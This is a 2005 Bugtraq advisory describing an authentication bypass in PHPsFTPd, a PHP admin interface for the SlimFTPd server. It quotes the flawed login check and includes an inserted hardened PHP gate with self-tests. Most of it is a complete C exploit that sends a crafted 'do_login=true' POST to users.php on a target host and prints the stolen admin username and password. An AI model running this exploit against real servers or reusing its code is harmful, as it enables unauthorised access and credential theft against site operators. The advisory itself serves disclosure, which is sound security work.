PHPsFTPd - Admin password leak

From: Steve (steve01_at_chello.at)
Date: 07/13/05

    Date: Wed, 13 Jul 2005 14:49:22 +0200
    To: bugtraq@securityfocus.com

    Author: Stefan Lochbihler
    Date: 11 July 2005
    Affected Software: PHPsFTPd
    Software Version: 0.2 -> 0.4
    Software URL: http://phpsftpd.sourceforge.net/
    Attack: Admin password leak

    About PHPsFTPd:
    PHPsFTPd is a web-based administration and configuration interface
    for the SlimFTPd FTP server. It can be used on any HTTP server that
    supports PHP and does not need a database or additional PHP modules,
    only SlimFTPd. It allows the administrators of the FTP server to
    configure it from within this interface as opposed to its native
    ASCII conf file. It shows statistics about the users that accessed
    the server, the files that were downloaded, server breakdowns, etc.

    Hi there again

    During a look at the code of the PHPsFTPd project I found out that it
    is possible to get the admin's username & password. This happens
    when we send a specially crafted POST request to the users.php script.
    The reason for the leak is in the inc.login.php script.
    When you take a look at the code below you see that the code will exit
    if there is no logged-in session or we don't try to log out.
    But when we POST the do_login var with some stuff in it, execution goes on.

    Snippet from inc.login.php:

    //login form
    if (!isset($_SESSION['logged']) && !isset($_GET['do_logout']) && !isset($_POST['do_login'])) {
        echo "<p>&nbsp;</p>
        <form action='index.php' method='post'>
        <img src=gfx/ico_notice.gif align=absmiddle> Please login with admin pass<br>
        <input class=td type='password' name='pass'>
        <input class=button type='submit' name='login' value='Login'>
        </form>
        ";
        die;
    }
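    The check above reduced to a function, beside a hardened form of it that treats a POSTed do_login as a login attempt to verify rather than as proof of being logged in. This is an added example and not PHPsFTPd's own code; gate_hardened(), the password hash and the sample requests are assumptions about how a fix could look.

```php
<?php
// Added example, not PHPsFTPd's own code. gate_vulnerable() reduces the
// original inc.login.php condition to a function; gate_hardened() is an
// assumed fix. All values below are constructed for the demonstration.

// Vulnerable: a POSTed do_login field by itself lets the page continue, so
// users.php?action=edit runs with no session at all. Kept as the "before".
function gate_vulnerable(array $session, array $get, array $post): bool
{
    return isset($session['logged']) || isset($get['do_logout']) || isset($post['do_login']);
}

// Hardened: only a verified session flag unlocks the page. A login POST is an
// attempt to be checked against the stored hash, never proof of being logged in.
function gate_hardened(array &$session, array $get, array $post, string $admin_pass_hash): bool
{
    if (isset($get['do_logout'])) {
        $session = [];                       // logging out needs no authentication
        return false;
    }
    if (isset($post['do_login'])) {
        $pass = (isset($post['pass']) && is_string($post['pass'])) ? $post['pass'] : '';
        if ($pass !== '' && password_verify($pass, $admin_pass_hash)) {
            if (session_status() === PHP_SESSION_ACTIVE) {
                session_regenerate_id(true); // fresh session id on privilege change
            }
            $session['logged'] = true;
            return true;
        }
        return false;                        // wrong or missing password: login form, die
    }
    return isset($session['logged']) && $session['logged'] === true;
}
// Self-check with a constructed admin password (a real config would hold the hash).
$hash = password_hash('constructed-example-pass', PASSWORD_DEFAULT);
$cases = [
    // label, POST body, expected result from the hardened gate
    ['exploit request: do_login=true, no pass', ['do_login' => 'true'], false],
    ['do_login with wrong pass', ['do_login' => '1', 'pass' => 'wrong'], false],
    ['do_login with correct pass', ['do_login' => '1', 'pass' => 'constructed-example-pass'], true],
    ['no POST at all, no session', [], false],
];
$session = [];
echo 'vulnerable gate, exploit request: ', var_export(gate_vulnerable($session, [], $cases[0][1]), true), "\n";
foreach ($cases as [$label, $post, $expected]) {
    $session = [];
    $got = gate_hardened($session, [], $post, $hash);
    echo ($got === $expected ? 'ok   ' : 'FAIL '), $label, "\n";
}
```

    The same rule has to hold on every page behind the gate: users.php must rely on the session flag alone, since a request that carries do_login is still unauthenticated until the password has been verified.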

    Exploit:
    Prints the admin's username & password

    // PHPsFTPd Admin Password Leak
    // tested on a WinXP SP1 box

    #include "stdafx.h"
    #include "stdio.h"
    #include "stdlib.h"     /* exit() */
    #include "string.h"     /* memset(), strncat(), strlen(), strstr() */
    #include "winsock2.h"

    #pragma comment (lib,"ws2_32")

    #define PORT 80
    #define rootdir "/phpsftpd/"

    typedef unsigned long ulong;

    void usage(char *);
    ulong checkhost(char *);

    /* resolve a hostname or dotted-quad string to a network-order IPv4 address */
    ulong checkhost(char *host)
    {
        struct hostent *hp;
        ulong host_ip=0;

        host_ip=inet_addr(host);
        if(host_ip==INADDR_NONE){
            hp=gethostbyname(host);
            if(!hp){
                printf("unable to resolve host...\n");
                exit(1);
            }
            host_ip= *(ulong*)hp->h_addr;
        }

        return host_ip;
    }

    void usage (char *progn){
        printf("Usage[%s]: www.targethost.com\n",progn);
        exit(0);
    }

    int main(int argc, char* argv[])
    {
        WSADATA wsa;
        SOCKET client;
        WORD wsVersion;

        char httpRequest[1024];
        char recvBuffer[1024];

        char *p;

        struct sockaddr_in addr;
        int err=0,recvSize=0;

        printf("PHPsFTPd Exploit v0.1 (c) by Steve mailto:steve01@chello.at\n");

        if(argc<2)
            usage(argv[0]);

        wsVersion=MAKEWORD(2,0);

        if(err=WSAStartup(wsVersion,&wsa)){
            printf("Error: WSAStartup\n");
            exit(0);
        }

        client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        if(client==INVALID_SOCKET){
            printf("Error: Create Socket\n");
            exit(0);
        }

        addr.sin_addr.s_addr = checkhost(argv[1]);
        addr.sin_port = htons(PORT);
        addr.sin_family = AF_INET;

        //build the request: a POST carrying only do_login, which is enough to
        //get past the check in inc.login.php
        memset(httpRequest,'\0',sizeof(httpRequest));

        strncat(httpRequest,"POST ",sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,rootdir,sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,"users.php?action=edit&username=root HTTP/1.1\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,"User-Agent: PHPSFTPD ACCOUNT MANAGER\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,"Host: www.targethost.com\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,"Content-Type: application/x-www-form-urlencoded\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,"Content-Length: 13\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,"\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);
        strncat(httpRequest,"do_login=true\r\n",sizeof(httpRequest)-strlen(httpRequest)-1);

        err=connect(client,(SOCKADDR*)&addr,sizeof(addr));

        //send the request and read the HTTP headers
        send(client,httpRequest,strlen(httpRequest),0);
        recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
        recvBuffer[recvSize]='\0';
        //second read: the body with the edit form that holds username & password
        recvSize=recv(client,recvBuffer,sizeof(recvBuffer)-1,0);
        recvBuffer[recvSize]='\0';

        //note: this breaks if the username or password contains a space (0x20),
        //since each value is read only up to the first one
        p=strstr(recvBuffer,"value=");
        printf("Username:");

        for(p=p+6;*p!=0x20;p++)
            putc(*p,stdout);

        p=strstr(p,"value=");

        printf("\n");
        printf("Password:");

        for(p=p+6;*p!=0x20;p++)
            putc(*p,stdout);

        closesocket(client);
        WSACleanup();

        printf("\n");
        return 0;
    }

    Vendor Status: The vendor has been informed!

    Discovered (c) by Steve

    -- 
    Created with Opera's revolutionary e-mail module: http://www.opera.com/m2/
